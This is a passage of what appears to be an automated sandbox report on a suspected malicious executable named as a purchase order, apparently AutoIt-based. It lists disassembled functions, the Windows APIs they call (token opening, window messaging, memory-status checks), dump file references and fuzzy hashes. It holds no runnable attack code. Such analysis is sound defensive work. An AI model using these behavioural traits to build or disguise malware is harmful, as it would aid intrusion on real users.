                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041C85D
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041C864
                                                                                                              • AttachThreadInput.USER32(00000000), ref: 0041C86B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2710830443-0
                                                                                                              • Opcode ID: e92b7f9a5b626fe2a1543c67ed73ea419a192b755fc7ad4bd3c46dac9bd46983
                                                                                                              • Instruction ID: 336cce1e532ebe16ece493eb2c25ef52e6374cd2f192b1a463861e162b730353
                                                                                                              • Opcode Fuzzy Hash: e92b7f9a5b626fe2a1543c67ed73ea419a192b755fc7ad4bd3c46dac9bd46983
                                                                                                              • Instruction Fuzzy Hash: DBE06571A8132476DB102BA2DC4DEDB7F1CEF167A1F008021F50D84460D6F5C581C7E5
                                                                                                              Function 0041B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0041B0D6
                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0041AC9D), ref: 0041B0DD
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0041AC9D), ref: 0041B0EA
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0041AC9D), ref: 0041B0F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 3974789173-0
                                                                                                              • Opcode ID: e495b80c854d45ba91718104bbe55b5b25246a2cb3392d15245efa7b1445371f
                                                                                                              • Instruction ID: 710ab090444aa142619fdeafb64c603f55f657b80bde870505d6dd59411f57b7
                                                                                                              • Opcode Fuzzy Hash: e495b80c854d45ba91718104bbe55b5b25246a2cb3392d15245efa7b1445371f
                                                                                                              • Instruction Fuzzy Hash: BFE0BF72F012129BD7205FB25D0DB873BA8EF59795F118828E651D6150EAA88441876A
                                                                                                              Function 003FB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSysColor.USER32(00000008), ref: 003FB496
                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 003FB4A0
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 003FB4B5
                                                                                                              • GetStockObject.GDI32(00000005), ref: 003FB4BD
                                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0045DE2B
                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0045DE38
                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0045DE51
                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0045DE6A
                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0045DE8A
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0045DE95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1946975507-0
                                                                                                              • Opcode ID: 03e7ba8f5636499698e6f72750a9ba75a91f230750e0c7e8f9ff4693ff4731b1
                                                                                                              • Instruction ID: ab020e5a9e20cb2ec6e4b209726a434ea37163385feb12abec04ae894e0060e1
                                                                                                              • Opcode Fuzzy Hash: 03e7ba8f5636499698e6f72750a9ba75a91f230750e0c7e8f9ff4693ff4731b1
                                                                                                              • Instruction Fuzzy Hash: 09E06D31E00240ABDF211F64EC0DBD93B11AB12336F00C236FA6A580E2D3F58584CB16
                                                                                                              Function 0041B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041B2DF
                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 0041B2EB
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041B2F4
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041B2FC
                                                                                                                • Part of subcall function 0041AB24: GetProcessHeap.KERNEL32(00000000,?,0041A848), ref: 0041AB2B
                                                                                                                • Part of subcall function 0041AB24: HeapFree.KERNEL32(00000000), ref: 0041AB32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 146765662-0
                                                                                                              • Opcode ID: 0a761919383cbb40367e4b77b1fc61caf400c9c3e4981ce54344b7c20b25a502
                                                                                                              • Instruction ID: d5d7d09612fd3aa3e7cc5bba980d1d8174b14570974b8e85d565a121ab55359f
                                                                                                              • Opcode Fuzzy Hash: 0a761919383cbb40367e4b77b1fc61caf400c9c3e4981ce54344b7c20b25a502
                                                                                                              • Instruction Fuzzy Hash: 91E0E636A04005BFCB012F95DC08859FF76FF883213108232F61581571DB76A471EB56
                                                                                                              Function 0045B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2889604237-0
                                                                                                              • Opcode ID: aacfa042ea623b0d9ef31125750ca0a0dcb7e2d0679b0077d9d04b1efc3640c5
                                                                                                              • Instruction ID: 31c59e3f1f2ab1ed30fa2eaa0a584b0f8dec2c6309b7e294414db492097a15c3
                                                                                                              • Opcode Fuzzy Hash: aacfa042ea623b0d9ef31125750ca0a0dcb7e2d0679b0077d9d04b1efc3640c5
                                                                                                              • Instruction Fuzzy Hash: 22E01AB1A00204EFDB015F70C84C62E7BA9EB4C351F118826FD5B8B251EBB498419B5A
                                                                                                              Function 0045B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2889604237-0
                                                                                                              • Opcode ID: fed51fb0f256d23382e5e55c66302fc9bead08910b27739b3d01e3ab73c77b47
                                                                                                              • Instruction ID: b9222b50e6212c43309b73dd3a69fc28ff90b648d913858eb975989e589c6114
                                                                                                              • Opcode Fuzzy Hash: fed51fb0f256d23382e5e55c66302fc9bead08910b27739b3d01e3ab73c77b47
                                                                                                              • Instruction Fuzzy Hash: D3E04FB1E00204EFDB015F70CC4C52D7BA9EB4C350F118425F95B8B250EBB498008B15
                                                                                                              Function 0041DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0041DEAA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContainedObject
                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                              • API String ID: 3565006973-3941886329
                                                                                                              • Opcode ID: bef7368eaf2b5946b91c89cb1a392c9a8310c3513ac005b856d9a03342e713bf
                                                                                                              • Instruction ID: af7bd0193ea30d455f430656960549af9ee7c579612d9d4c59073e489051a33a
                                                                                                              • Opcode Fuzzy Hash: bef7368eaf2b5946b91c89cb1a392c9a8310c3513ac005b856d9a03342e713bf
                                                                                                              • Instruction Fuzzy Hash: 30914AB0A00701AFDB14DF64C884BAABBB5BF48714F10856EF94ACB290DB74E981CB54
                                                                                                              Function 0042290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscpy
                                                                                                              • String ID: I/E$I/E
                                                                                                              • API String ID: 3048848545-1856474202
                                                                                                              • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                                              • Instruction ID: 599762d713cba993f80f080d0b080a5f1a7b967be61c5e8826fb4983d9abb808
                                                                                                              • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                                              • Instruction Fuzzy Hash: F441F771B00136BACF25DF89E141AFEB770EF08314F90504BE881AB291DBB85E82C758
                                                                                                              Function 003FBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000), ref: 003FBCDA
                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 003FBCF3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                              • String ID: @
                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                              • Opcode ID: 5ed615ed1cf9babb75ccb4c5d9e3c4e225370a1d8a7201c9d351fd8637891eb6
                                                                                                              • Instruction ID: 6b718287d41df1d2218c108000cda39b650403c9ce5174e9c81b998ee3052dce
                                                                                                              • Opcode Fuzzy Hash: 5ed615ed1cf9babb75ccb4c5d9e3c4e225370a1d8a7201c9d351fd8637891eb6
                                                                                                              • Instruction Fuzzy Hash: 05513871408748DBE321AF14D885BAFBBE8FB95354F41485EF2C8460A2DF7089A88756
                                                                                                              Function 0042C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E44ED: __fread_nolock.LIBCMT ref: 003E450B
                                                                                                              • _wcscmp.LIBCMT ref: 0042C65D
                                                                                                              • _wcscmp.LIBCMT ref: 0042C670
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                                              • String ID: FILE
                                                                                                              • API String ID: 4029003684-3121273764
                                                                                                              • Opcode ID: 2b598b730961f3a154cf6bc8c9567391eba23cf556b5cfab7a66c61e2eb1140f
                                                                                                              • Instruction ID: ec3b0ab5cdf53cb8eaa4a536722e06bab4fd97a57e73a1e43a8c6f45eda12924
                                                                                                              • Opcode Fuzzy Hash: 2b598b730961f3a154cf6bc8c9567391eba23cf556b5cfab7a66c61e2eb1140f
                                                                                                              • Instruction Fuzzy Hash: F041E572B0026ABADF21ABA59C81FEF77B9EF49704F00006AF605FB1C1D6749A048B55
                                                                                                              Function 0044A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044A85A
                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044A86F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: '
                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                              • Opcode ID: c52a322eddb14cc5f6a5c0f9eaa17ea33656ca4e082540a051242241f855beb5
                                                                                                              • Instruction ID: 652122198642fb2cdd78bd4d2851cdec62e574d67a5a1e97e5438a2fc633aa97
                                                                                                              • Opcode Fuzzy Hash: c52a322eddb14cc5f6a5c0f9eaa17ea33656ca4e082540a051242241f855beb5
                                                                                                              • Instruction Fuzzy Hash: 39411875E403099FEB14DF68C881BDABBB9FB09304F14006AE905EB391D774A952CFA5
                                                                                                              Function 0044975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0044980E
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0044984A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$DestroyMove
                                                                                                              • String ID: static
                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                              • Opcode ID: ce58b52b0e3662e6c9c01261531baad5ab57b254507cb9a6051e061c4b3d5a52
                                                                                                              • Instruction ID: 925cf70faa05ac8a708aaf27f0b3f25cac29161f992f5c0d33a3a85593ce93af
                                                                                                              • Opcode Fuzzy Hash: ce58b52b0e3662e6c9c01261531baad5ab57b254507cb9a6051e061c4b3d5a52
                                                                                                              • Instruction Fuzzy Hash: B831CF31510204AEEB109F38CC81BFB73A9FF99320F00861AF9A9C7190CA34AC81D768
                                                                                                              Function 00425157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004251C6
                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00425201
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                              • Opcode ID: 8d34b7a04de841e4bdf2a863d3716994f039babc1dd10e51c07381c207f16e1f
                                                                                                              • Instruction ID: 29a5d05baf9d3758d402cc5eb57b9687519cfd6d80f5906fb405c1356d8437e0
                                                                                                              • Opcode Fuzzy Hash: 8d34b7a04de841e4bdf2a863d3716994f039babc1dd10e51c07381c207f16e1f
                                                                                                              • Instruction Fuzzy Hash: D431F931B00324EBDB18CF99E8457AFBBF4AF45390F54005BE981A62E0D7789944CF29
                                                                                                              Function 0043658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __snwprintf
                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                              • API String ID: 2391506597-2584243854
                                                                                                              • Opcode ID: 2ba4eccfe41ba4ed149ce23983bfcde37dbb8996db53cdcaee26f6d7351a8efb
                                                                                                              • Instruction ID: 9e498aa7bab7e102f99371b18bef3597acee0573d603e7a710c46ada3d5a965c
                                                                                                              • Opcode Fuzzy Hash: 2ba4eccfe41ba4ed149ce23983bfcde37dbb8996db53cdcaee26f6d7351a8efb
                                                                                                              • Instruction Fuzzy Hash: FF21D231600229BFCF11EF65C882FEE77B4AF49344F11416AF505AB181DB78EA45CBA9
                                                                                                              Function 004493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0044945C
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00449467
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: Combobox
                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                              • Opcode ID: af2a91fbbc63925d892f5fb80c139936c8dec7e95718d9e7253211afab02152e
                                                                                                              • Instruction ID: 204827a8ce1232fabbeae3161450803e68c26520d090c5920b027a2e6b404687
                                                                                                              • Opcode Fuzzy Hash: af2a91fbbc63925d892f5fb80c139936c8dec7e95718d9e7253211afab02152e
                                                                                                              • Instruction Fuzzy Hash: 7F11B2713002086FFF219E54DC81EBB376EEB893A4F100126F918972A0D6799C529B68
                                                                                                              Function 0044DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • GetActiveWindow.USER32 ref: 0044DA7B
                                                                                                              • EnumChildWindows.USER32(?,0044D75F,00000000), ref: 0044DAF5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
